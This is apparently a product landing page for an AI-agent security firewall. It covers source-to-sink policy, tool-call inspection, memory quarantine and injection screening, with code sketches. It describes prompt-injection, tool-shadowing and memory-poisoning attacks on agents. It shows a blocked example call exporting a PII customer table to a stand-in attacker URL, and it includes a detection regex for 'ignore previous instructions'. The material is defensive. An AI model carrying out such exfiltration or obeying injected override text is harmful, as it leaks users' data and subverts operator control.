Ultra13
For CTOs · VP Engineering · AI leads

Ship AI agents with a security harness, not hope.

Ultra13 gives engineering teams offensive agent testing, context-aware runtime controls, and regression validation for agents that use RAG, memory, MCP, APIs, code execution, browsers, and internal tools.

Where Ultra13 sits
External / user content
untrusted by default
Input classification + trust labelling
provenance attached to every span
Prompt / context assembly
what the model is allowed to see
RAG · memory · MCP · tool descriptions
evidence, not instruction
Ultra13 Context Firewall
source-to-sink policy + decisions
Model / agent loop
plan → tool → observe → act
Tool gateway / action gateway
inspected before execution
Audit log + validation harness
replayable, regression-tested
Control points

Enforcement where it actually matters.

The firewall is not a wrapper around the prompt. It sits at every boundary the agent crosses.

Prompt / context assembly

Decide what the model is allowed to see for this request.

Retrieved context

Treat RAG chunks as untrusted evidence with per-source policy.

Memory reads / writes

Gate what becomes persistent, and what it’s allowed to authorize.

MCP responses

Validate tool descriptions and responses; catch rug-pulls and shadowing.

Tool calls

Inspect name, args, identity, tenant, data class, and side effects.

Outbound actions

Control egress, exports, webhooks, shell, and code execution.
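One way to picture the MCP control point above is to pin each approved tool definition and compare it on every listing. The sketch below is illustrative only, not Ultra13's implementation: `fingerprint`, `check_tools`, the `pinned` mapping, and the tool dictionary fields are all hypothetical names chosen for the example.

```python
import hashlib
import json


def fingerprint(tool: dict) -> str:
    """Stable SHA-256 over the fields of a tool definition the model sees."""
    canonical = json.dumps(
        {
            "name": tool["name"],
            "description": tool["description"],
            "input_schema": tool.get("input_schema", {}),
        },
        sort_keys=True,
        separators=(",", ":"),
    )
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


def check_tools(pinned: dict, server: str, tools: list) -> list:
    """Compare tools listed by `server` against pinned approvals.

    `pinned` maps tool name -> (approved server, approved fingerprint).
    Returns a list of (finding, tool name) tuples; empty means no findings.
    """
    findings = []
    for tool in tools:
        name = tool["name"]
        if name not in pinned:
            findings.append(("unapproved", name))
            continue
        pinned_server, pinned_fp = pinned[name]
        if pinned_server != server:
            # Same name offered by a different server: possible shadowing.
            findings.append(("shadowing", name))
        elif pinned_fp != fingerprint(tool):
            # Definition changed after approval: possible rug-pull.
            findings.append(("rug_pull", name))
    return findings
```

Pinning by content hash means any post-approval edit to a description or schema surfaces as a finding, whatever the edit says.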

Source-to-sink policy

Which context can influence which action.

External web content can answer a question — but it cannot authorize a database export, a shell command, or an outbound webhook. You declare the boundary; the firewall enforces it.

policy/source-to-sink.rego
allow            sink=answer        from={user, rag, web, mcp}
deny             sink=db.export     from={web, rag, mcp, memory}
deny             sink=shell.exec    from=*            unless approved
deny             sink=webhook.post  from={web, rag}   # block egress
require_approval sink=*.write       when data_class=PII
treat            retrieved_context  as evidence not instruction
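To make the rule semantics concrete, here is a minimal Python sketch of how rules like the ones above might be evaluated. It is an assumption-laden illustration, not the product's policy engine: the `RULES` table, the `decide` function, the condition names, and the `no_match` fallthrough are all hypothetical, and a real deployment would choose its own default for unmatched requests.

```python
from fnmatch import fnmatchcase

ANY = "*"

# (effect, sink pattern, sources, condition), mirroring the rules above.
RULES = [
    ("deny", "db.export", {"web", "rag", "mcp", "memory"}, None),
    ("deny", "shell.exec", ANY, "unless_approved"),
    ("deny", "webhook.post", {"web", "rag"}, None),
    ("require_approval", "*.write", ANY, "pii_only"),
    ("allow", "answer", {"user", "rag", "web", "mcp"}, None),
]


def decide(sink, sources, data_class=None, approved=False):
    """Return 'deny', 'require_approval', 'allow', or 'no_match'.

    `sources` is the set of context origins that influenced the action.
    """
    sources = set(sources)
    for effect, pattern, rule_sources, condition in RULES:
        if not fnmatchcase(sink, pattern):
            continue
        if effect == "allow":
            # Allow only when every influencing source is on the list.
            if rule_sources == ANY or sources <= rule_sources:
                return "allow"
            continue
        # Restrictive rules fire when any influencing source is listed.
        if rule_sources != ANY and not (sources & rule_sources):
            continue
        if condition == "unless_approved" and approved:
            continue
        if condition == "pii_only" and data_class != "PII":
            continue
        if effect == "require_approval" and approved:
            continue
        return effect
    return "no_match"  # assumption: the caller picks the default
```

For example, `decide("db.export", {"user", "web"})` returns `"deny"` because web content is among the influences, even though the user also asked.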
Tool-call inspection

Inspect the call before it runs.

Tool name, arguments, target resource, user identity, tenant, data classification, side effects, and the trust of the context that requested it — evaluated against policy, then a decision.

firewall.inspect(tool_call)
BLOCK
tool_name            database.export
arguments {
  table              "customers"
  format             "csv"
  destination        "https://paste.evil.sh/x"
}
user_identity        svc-agent@app
tenant_id            acme-prod
data_classification  PII · restricted
side_effects         bulk_read · network_egress
origin_trust         external (web content)
policy_decision      BLOCK
// source-to-sink: external context cannot authorize a bulk PII export to an untrusted destination
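The inspection above could be sketched in Python roughly as follows. This is a simplified illustration under stated assumptions: the `ToolCall` dataclass mirrors the fields shown in the panel, but `inspect_call`, `TRUSTED_DESTINATIONS`, and the two rules are hypothetical stand-ins for a real policy evaluation.

```python
from dataclasses import dataclass
from urllib.parse import urlparse

# Hypothetical allowlist of egress hosts; not taken from the product.
TRUSTED_DESTINATIONS = {"exports.internal.example"}


@dataclass
class ToolCall:
    tool_name: str
    arguments: dict
    user_identity: str
    tenant_id: str
    data_classification: set
    side_effects: set
    origin_trust: str  # e.g. "user" or "external"


def inspect_call(call: ToolCall):
    """Return (decision, reasons) for a tool call before it executes."""
    reasons = []
    destination = call.arguments.get("destination")
    host = urlparse(destination).hostname if destination else None

    # Rule 1: external context cannot authorize a bulk read.
    if call.origin_trust == "external" and "bulk_read" in call.side_effects:
        reasons.append("external context cannot authorize a bulk read")

    # Rule 2: network egress must target an allowlisted host.
    if "network_egress" in call.side_effects and host not in TRUSTED_DESTINATIONS:
        reasons.append(f"untrusted destination: {host}")

    return ("BLOCK" if reasons else "ALLOW", reasons)
```

Returning the reasons alongside the decision keeps the audit log explainable: each blocked call records which rule fired.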
Memory safety

Poisoned memory never becomes standing instruction.

Untrusted memory is quarantined and trust-labelled, with TTLs on what can persist. A note an attacker planted last session can’t silently authorize an action in this one.

trust-label · quarantine · ttl · no implicit auth
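A minimal sketch of the four ideas above (trust label, quarantine, TTL, no implicit authorization) might look like this. Everything here is assumed for illustration: `MemoryStore`, `MemoryEntry`, `may_authorize`, the one-day TTL, and the choice to trust only direct user input are hypothetical, not the product's data model.

```python
from dataclasses import dataclass
from typing import List, Optional

UNTRUSTED_TTL_SECONDS = 24 * 3600  # assumed: quarantined notes expire after a day
TRUSTED_SOURCES = {"user"}         # assumed: only direct user input is trusted


@dataclass(frozen=True)
class MemoryEntry:
    text: str
    source: str
    trust: str                    # "trusted" or "quarantined"
    expires_at: Optional[float]   # None means no expiry


class MemoryStore:
    def __init__(self) -> None:
        self._entries: List[MemoryEntry] = []

    def write(self, text: str, source: str, now: float) -> MemoryEntry:
        """Label the entry at write time; untrusted entries get a TTL."""
        trusted = source in TRUSTED_SOURCES
        entry = MemoryEntry(
            text=text,
            source=source,
            trust="trusted" if trusted else "quarantined",
            expires_at=None if trusted else now + UNTRUSTED_TTL_SECONDS,
        )
        self._entries.append(entry)
        return entry

    def read(self, now: float) -> List[MemoryEntry]:
        """Drop expired entries, then return what remains."""
        self._entries = [
            e for e in self._entries
            if e.expires_at is None or e.expires_at > now
        ]
        return list(self._entries)


def may_authorize(entry: MemoryEntry) -> bool:
    """Quarantined memory can inform an answer but never authorize an action."""
    return entry.trust == "trusted"
```

Labelling at write time matters: the trust decision is made while the provenance is still known, rather than guessed when the note is read back in a later session.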
Continuous validation

Regression tests for agent security.

Re-run the offensive suite whenever the model, prompt, retrieval source, tool, or policy changes. Every change resets the risk posture — so every change gets re-tested.

model swap · prompt change · new tool · new source · policy diff
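The re-test trigger can be pictured as a diff over the five inputs named above. The sketch below assumes a hypothetical configuration dictionary with keys `model`, `prompt`, `tools`, `sources`, and `policy`; the function names are illustrative and not part of any Ultra13 API.

```python
TRACKED_COMPONENTS = ("model", "prompt", "tools", "sources", "policy")


def changed_components(old: dict, new: dict) -> list:
    """Return the tracked components whose values differ between two configs."""
    return [k for k in TRACKED_COMPONENTS if old.get(k) != new.get(k)]


def needs_rerun(old: dict, new: dict) -> bool:
    """Any change to a tracked component should trigger the offensive suite."""
    return bool(changed_components(old, new))
```

In a CI job this check would run against the last validated configuration, with the list of changed components recorded next to the suite results.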
Integrations

Framework-neutral by design.

Ultra13 wraps the boundaries, not your framework. Bring whatever stack your agents already run on.

OpenAI · Anthropic · Bedrock · LangChain · LlamaIndex · Custom agents · MCP · REST APIs · Vector DBs · Internal tools
In the path

Inline, without inheriting new risk.

Drop it between your agent and the world without a new model dependency, a new token bill, or a new region problem.

Deterministic-first screening

Fast deterministic detectors run first, then a purpose-built specialist classifier checks what passes; there is no generative LLM judge in the hot path. Two tiers, fail-open: a classifier outage falls back to the detectors and never quarantines clean traffic.
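The two-tier, fail-open flow described above can be sketched as follows. This is a toy illustration: the single regex stands in for a real detector set, and `screen`, `deterministic_tier`, and the `classifier` callable are hypothetical names rather than the product's interfaces.

```python
import re

# Illustrative detector only; a real deterministic tier would have many.
INJECTION_PATTERNS = [
    re.compile(r"ignore (all )?previous instructions", re.IGNORECASE),
]


def deterministic_tier(text: str) -> bool:
    """Tier 1: cheap pattern checks that always run."""
    return any(p.search(text) for p in INJECTION_PATTERNS)


def screen(text: str, classifier=None) -> str:
    """Return 'block' or 'allow' for a piece of incoming content.

    `classifier` is an optional callable returning True when content is
    flagged. If it raises, the verdict falls back to tier 1 alone.
    """
    if deterministic_tier(text):
        return "block"
    if classifier is None:
        return "allow"
    try:
        flagged = classifier(text)
    except Exception:
        # Fail-open: a classifier outage must not quarantine clean traffic.
        return "allow"
    return "block" if flagged else "allow"
```

Because tier 1 runs before the classifier and independently of it, an outage in tier 2 degrades coverage without removing the deterministic checks.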

Your model stays yours

The firewall fronts your agent and screens the boundary — bring your own model, keys, and provider bill. We screen the traffic; we never proxy-resell tokens or replace your model.

Choose your region

Run the managed service in the USA, EU, or UK for data residency — or self-host the data plane in your own VPC for full control.

Performance

Fast enough to leave in the request path.

The deterministic screening tier is CPU-cheap — measured on a single core, not estimated.

≈ 0.15 ms
deterministic screening CPU / request · p99 ≈ 0.19 ms
≈ 0.29 ms
end-to-end through the proxy · p99 ≈ 0.5 ms
< 0.1%
added latency vs. a typical LLM call, imperceptible to a user

Inline SDK adds only screening CPU — no network hop. A quota rule adds one ~0.1–0.2 ms Redis round-trip; the opt-in classifier and OCR tiers add inference only when enabled.
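The percentage claim follows from simple arithmetic on the figures above: 0.29 ms of overhead stays under 0.1% for any LLM call that takes at least about 290 ms. The sketch below works this through; the 1,000 ms call duration is an assumed example value, not a measurement from this page.

```python
PROXY_MS = 0.29               # end-to-end through the proxy (from the figures above)
REDIS_MS_RANGE = (0.1, 0.2)   # optional quota rule round-trip (from the text above)
ASSUMED_LLM_CALL_MS = 1000.0  # assumption: a one-second model call


def overhead_pct(overhead_ms: float, llm_call_ms: float) -> float:
    """Added latency as a percentage of the LLM call duration."""
    return 100.0 * overhead_ms / llm_call_ms


def min_llm_ms_for_budget(overhead_ms: float, budget_pct: float = 0.1) -> float:
    """Shortest LLM call for which the overhead stays within budget_pct."""
    return overhead_ms * 100.0 / budget_pct


if __name__ == "__main__":
    print(round(overhead_pct(PROXY_MS, ASSUMED_LLM_CALL_MS), 4))
    print(round(min_llm_ms_for_budget(PROXY_MS), 1))
    worst_case = PROXY_MS + REDIS_MS_RANGE[1]
    print(round(overhead_pct(worst_case, ASSUMED_LLM_CALL_MS), 4))
```

Even with the quota rule's upper-bound Redis round-trip added, the overhead on the assumed one-second call stays below the 0.1% figure.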

Give us one workflow and one toolchain. We’ll show you where it breaks.

A technical teardown, context firewall controls, and a regression harness for the agent you’re shipping.